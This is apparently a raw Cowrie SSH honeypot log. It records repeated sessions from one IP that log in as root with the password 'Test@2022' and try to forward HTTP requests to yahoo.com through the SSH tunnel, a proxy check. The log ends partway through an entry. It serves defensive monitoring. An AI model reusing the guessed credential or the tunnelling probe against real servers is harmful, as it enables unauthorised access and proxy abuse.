{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.863841Z","src_ip":"213.209.150.239","session":"8b4b77c87735"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.921248Z","src_ip":"213.209.150.239","session":"8b4b77c87735"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38094,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8405b27b685","protocol":"ssh","message":"New connection: 213.209.150.239:38094 (1.2.3.4:22) [session: f8405b27b685]","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.976883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:43.977500Z","src_ip":"213.209.150.239","session":"f8405b27b685"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.034475Z","src_ip":"213.209.150.239","session":"f8405b27b685"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.316476Z","src_ip":"213.209.150.239","session":"f8405b27b685"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":28755,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:28755","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.373790Z","session":"f8405b27b685"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.430491Z","src_ip":"213.209.150.239","session":"f8405b27b685"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":5354,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5354","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.587043Z","session":"f8405b27b685"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.643552Z","src_ip":"213.209.150.239","session":"f8405b27b685"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.700897Z","src_ip":"213.209.150.239","session":"f8405b27b685"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38162,"dst_ip":"1.2.3.4","dst_port":22,"session":"18050d3be7df","protocol":"ssh","message":"New connection: 213.209.150.239:38162 (1.2.3.4:22) [session: 18050d3be7df]","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.747019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.747907Z","src_ip":"213.209.150.239","session":"18050d3be7df"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:44.794992Z","src_ip":"213.209.150.239","session":"18050d3be7df"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.029632Z","src_ip":"213.209.150.239","session":"18050d3be7df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":27426,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27426","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.078343Z","session":"18050d3be7df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.125550Z","src_ip":"213.209.150.239","session":"18050d3be7df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":7076,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7076","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.261611Z","session":"18050d3be7df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.308898Z","src_ip":"213.209.150.239","session":"18050d3be7df"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.356870Z","src_ip":"213.209.150.239","session":"18050d3be7df"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38209,"dst_ip":"1.2.3.4","dst_port":22,"session":"d78b765e9a04","protocol":"ssh","message":"New connection: 213.209.150.239:38209 (1.2.3.4:22) [session: d78b765e9a04]","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.412690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.413556Z","src_ip":"213.209.150.239","session":"d78b765e9a04"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.470372Z","src_ip":"213.209.150.239","session":"d78b765e9a04"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.753224Z","src_ip":"213.209.150.239","session":"d78b765e9a04"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":5534,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5534","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.811871Z","session":"d78b765e9a04"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:45.868847Z","src_ip":"213.209.150.239","session":"d78b765e9a04"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":27766,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27766","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.023124Z","session":"d78b765e9a04"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.079772Z","src_ip":"213.209.150.239","session":"d78b765e9a04"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.137155Z","src_ip":"213.209.150.239","session":"d78b765e9a04"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38271,"dst_ip":"1.2.3.4","dst_port":22,"session":"153fedca4bbc","protocol":"ssh","message":"New connection: 213.209.150.239:38271 (1.2.3.4:22) [session: 153fedca4bbc]","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.192841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.194373Z","src_ip":"213.209.150.239","session":"153fedca4bbc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.250932Z","src_ip":"213.209.150.239","session":"153fedca4bbc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.533054Z","src_ip":"213.209.150.239","session":"153fedca4bbc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":28746,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:28746","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.591120Z","session":"153fedca4bbc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.647753Z","src_ip":"213.209.150.239","session":"153fedca4bbc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":16173,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16173","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.803001Z","session":"153fedca4bbc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.859831Z","src_ip":"213.209.150.239","session":"153fedca4bbc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.918177Z","src_ip":"213.209.150.239","session":"153fedca4bbc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38331,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c712e9d8bde","protocol":"ssh","message":"New connection: 213.209.150.239:38331 (1.2.3.4:22) [session: 6c712e9d8bde]","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.973996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:46.974630Z","src_ip":"213.209.150.239","session":"6c712e9d8bde"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.031383Z","src_ip":"213.209.150.239","session":"6c712e9d8bde"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.314269Z","src_ip":"213.209.150.239","session":"6c712e9d8bde"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":15737,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15737","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.371903Z","session":"6c712e9d8bde"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.428726Z","src_ip":"213.209.150.239","session":"6c712e9d8bde"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":5570,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:5570","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.587206Z","session":"6c712e9d8bde"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.644032Z","src_ip":"213.209.150.239","session":"6c712e9d8bde"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.701541Z","src_ip":"213.209.150.239","session":"6c712e9d8bde"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38411,"dst_ip":"1.2.3.4","dst_port":22,"session":"68766fbd476e","protocol":"ssh","message":"New connection: 213.209.150.239:38411 (1.2.3.4:22) [session: 68766fbd476e]","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.747634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.748761Z","src_ip":"213.209.150.239","session":"68766fbd476e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v0